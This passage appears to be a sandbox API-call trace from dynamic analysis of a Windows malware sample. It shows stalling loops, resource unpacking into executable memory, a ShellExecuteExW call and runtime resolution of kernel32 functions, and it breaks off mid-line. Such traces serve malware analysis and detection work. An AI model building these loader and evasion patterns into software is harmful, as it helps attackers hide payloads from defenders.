[0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.090] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.091] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.092] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.093] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.094] GetObjectType (h=0x0) returned 0x0 [0077.095] GetObjectType (h=0x0) returned 0x0 [0077.095] GetObjectType (h=0x0) returned 0x0 [0077.095] GetObjectType (h=0x0) returned 0x0 [0077.095] GetObjectType (h=0x0) returned 0x0 [0077.095] GetObjectType (h=0x0) returned 0x0 [0077.095] GetObjectType (h=0x0) returned 0x0 [0077.095] GetObjectType (h=0x0) returned 0x0 [0077.095] GetObjectType (h=0x0) returned 0x0 [0077.478] FindResourceA (hModule=0x400000, lpName="f49faodfk2932k3", lpType=0xa) returned 0x477c90 [0077.478] LoadResource (hModule=0x400000, hResInfo=0x477c90) returned 0x47d890 [0077.478] SizeofResource (hModule=0x400000, hResInfo=0x477c90) returned 0x11a328 [0077.478] LockResource (hResData=0x47d890) returned 0x47d890 [0077.478] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x11a38d, flAllocationType=0x1000, flProtect=0x40) returned 0x2380000 [0077.546] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x11a38d, flAllocationType=0x1000, flProtect=0x40) returned 0x2830000 [0077.583] CreateMetaFileA (pszFile="") returned 0x0 [0077.596] CreateMetaFileA (pszFile="") returned 0x0 [0077.596] CreateMetaFileA (pszFile="") returned 0x0 [0077.596] CreateMetaFileA (pszFile="") returned 0x0 [0077.596] CreateMetaFileA (pszFile="") returned 0x0 [0077.596] CreateMetaFileA (pszFile="") returned 0x0 [0077.596] CreateMetaFileA (pszFile="") returned 0x0 [0077.596] CreateMetaFileA (pszFile="") returned 0x0 [0077.596] CreateMetaFileA (pszFile="") returned 0x0 [0077.596] CreateMetaFileA (pszFile="") returned 0x0 [0077.596] CreateMetaFileA (pszFile="") returned 0x0 [0077.596] CreateMetaFileA (pszFile="") returned 0x0 [0077.596] CreateMetaFileA (pszFile="") returned 0x0 [0077.596] CreateMetaFileA (pszFile="") returned 0x0 [0077.596] CreateMetaFileA (pszFile="") returned 0x0 [0077.596] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.597] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.598] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.599] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.600] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.601] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.602] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.603] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.604] CreateMetaFileA (pszFile="") returned 0x0 [0077.829] ShellExecuteExW (in: pExecInfo=0x19fd28*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb=0x0, lpFile="ewygmopint90kmngfdxh", lpParameters=0x0, lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x19fd28*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb=0x0, lpFile="ewygmopint90kmngfdxh", lpParameters=0x0, lpDirectory=0x0, nShow=0, hInstApp=0x2, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 0 [0077.839] NtdllDefWindowProc_A (hWnd=0x501e8, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0077.840] CallWindowProcA (lpPrevWndFunc=0x406844, hWnd=0x701ec, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0079.121] EndDoc (hdc=0x0) returned -1 [0079.121] EndPage (hdc=0x0) returned -1 [0079.121] EndPath (hdc=0x0) returned 0 [0079.139] GetProcAddress (hModule=0x75e80000, lpProcName="LoadLibraryExA") returned 0x75f2cb90 [0079.139] LoadLibraryExA (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x74650000 [0079.139] GetProcAddress (hModule=0x74650000, lpProcName="GetProcAddress") returned 0x746678b0 [0079.140] GetProcAddress (hModule=0x74650000, lpProcName="VirtualAlloc") returned 0x74667810 [0079.140] GetProcAddress (hModule=0x74650000, lpProcName="VirtualFree") returned 0x74667600 [0079.140] GetProcAddress (hModule=0x74650000, lpProcName="UnmapViewOfFile") returned 0x74669b20 [0079.140] GetProcAddress (hModule=0x74650000, lpProcName="VirtualProtect") returned 0x74667a50 [0079.140] GetProcAddress (hModule=0x74650000, lpProcName="LoadLibraryExA") returned 0x7466a270 [0079.140] GetProcAddress (hModule=0x74650000, lpProcName="GetModuleHandleA") returned 0x746699f0 [0079.140] GetProcAddress (hModule=0x74650000, lpProcName="GetModuleHandleW") returned 0x74669bc0 [0079.140] GetProcAddress (hModule=0x74650000, lpProcName="CreateFileA") returned 0x74676880 [0079.141] GetProcAddress (hModule=0x74650000, lpProcName="SetFilePointer") returned 0x74676c40 [0079.141] GetProcAddress (hModule=0x74650000, lpProcName="WriteFile") returned 0x74676ca0 [0079.141] GetProcAddress (hModule=0x74650000, lpProcName="CloseHandle") returned 0x74676630 [0079.141] GetProcAddress (hModule=0x74650000, lpProcName="GetTempPathA") returned 0x74676b20 [0079.141] GetProcAddress (hModule=0x74650000, lpProcName="lstrlenA") returned 0x74668c80 [0079.141] GetProcAddress (hModule=0x74650000, lpProcName="lstrcatA") returned 0x7466f640 [0079.141] GetProcAddress (hModule=0x74650000, lpProcName="FreeLibrary") returned 0x74669f50 [0079.141] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0079.141] GetProcAddress (hModule=0x75e80000, lpProcName="VirtualAlloc") returned 0x75f3c630 [0079.142] VirtualAlloc (lpAddress=0x0, dwSize=0xd2200, flAllocationType=0x3000, flProtect=0x40) returned 0x2e10000 [0079.174] VirtualProtect (in: lpAddress=0x400000, dwSize=0xd7000, flNewProtect=0x40, lpflOldProtect=0x19f780 | out: lpflOldProtect=0x19f780*=0x2) returned 1 [0079.245] LoadLibraryExA (lpLibFileName="KERNEL32.dll", hFile=0x0, dwFlags=0x0) returned 0x74650000 [0079.245] GetProcAddress (hModule=0x74650000, lpProcName="LocalFree") returned 0x746679a0 [0079.245] GetProcAddress (hModule=0x74650000, lpProcName="HeapAlloc") returned 0x77922bd0 [0079.245] GetProcAddress (hModule=0x74650000, lpProcName="GetProcessHeap") returned 0x74667710 [0079.245] GetProcAddress (hModule=0x74650000, lpProcName="HeapFree") returned 0x74661ba0 [0079.246] GetProcAddress (hModule=0x74650000, lpProcName="lstrcatA") returned 0x7466f640 [0079.246] GetProcAddress (hModule=0x74650000, lpProcName="CreateDirectoryA") returned 0x74676850 [0079.246] GetProcAddress (hModule=0x74650000, lpProcName="FindClose") returned 0x746768e0 [0079.246] GetProcAddress (hModule=0x74650000, lpProcName="FindNextFileW") returned 0x746769a0 [0079.246] GetProcAddress (hModule=0x74650000, lpProcName="DeleteFileW") returned 0x746768c0 [0079.246] GetProcAddress (hModule=0x74650000, lpProcName="lstrcmpW") returned 0x74667970 [0079.246] GetProcAddress (hModule=0x74650000, lpProcName="FindFirstFileW") returned 0x74676960 [0079.246] GetProcAddress (hModule=0x74650000, lpProcName="lstrcatW") returned 0x7468d170 [0079.247] GetProcAddress (hModule=0x74650000, lpProcName="lstrcpyW") returned 0x7468d260 [0079.247] GetProcAddress (hModule=0x74650000, lpProcName="FindNextFileA") returned 0x74676980 [0079.247] GetProcAddress (hModule=0x74650000, lpProcName="CopyFileA") returned 0x7466f780 [0079.247] GetProcAddress (hModule=0x74650000, lpProcName="FindFirstFileA") returned 